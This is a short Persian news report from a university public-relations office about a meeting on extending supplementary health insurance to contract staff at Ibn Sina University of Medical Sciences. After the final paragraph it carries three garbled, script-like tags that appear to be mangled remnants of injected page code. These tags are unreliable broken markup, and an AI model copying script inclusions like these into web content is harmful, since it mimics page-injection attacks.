مدیر امور رفاهی و پشتیبانی دانشگاه گفت:

در تلاش هستیم که همکاران نیروهای شرکتی دانشگاه از مزایای بیمه تکمیلی درمان برخوردار شوند

جلسه بررسی چگونگی انجام  بیمه تکمیل درمان برای نیروهای شرکتی دانشگاه در دفتر امور رفاهی و پشتیبانی دانشگاه علوم پزشکی ابن سینا برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه بررسی چگونگی انجام  بیمه تکمیل درمان برای نیروهای شرکتی دانشگاه با حضور آقایانی مدیر امور رفاهی و پشتیبانی، دکترعقیلیان مشاور رییس دانشگاه و مدیر امور حقوقی و کارشناسان مربوطه برگزار شد.

در این جلسه به بررسی چگونگی ایجاد بستری مناسب و در چهارچوب قانون در خصوص نیروهای شرکتی دانشگاه و برخورداری آنان از مزایای بیمه تکمیلی درمان پرداخته شد.

آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه درباره نیروهای شرکتی مجموعه دانشگاه عنوان کرد: همکاران نیروهای شرکتی در مجموعه دانشگاه نیز همانند دیگر نیروهای قراردادی و رسمی، زحمات فراوان و قابل توجهی را متقبل می شوند و از دید بنده تفاوتی با دیگر نیروها ندارند و قابل احترام هستند و مجموعه معاونت توسعه مدیریت و منابع دانشگاه در تلاش است که در چهارچوب قانون بستری را فراهم کند که این نیرو ها نیز از مزایای بیمه تکمیلی درمان برخوردار شوند.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *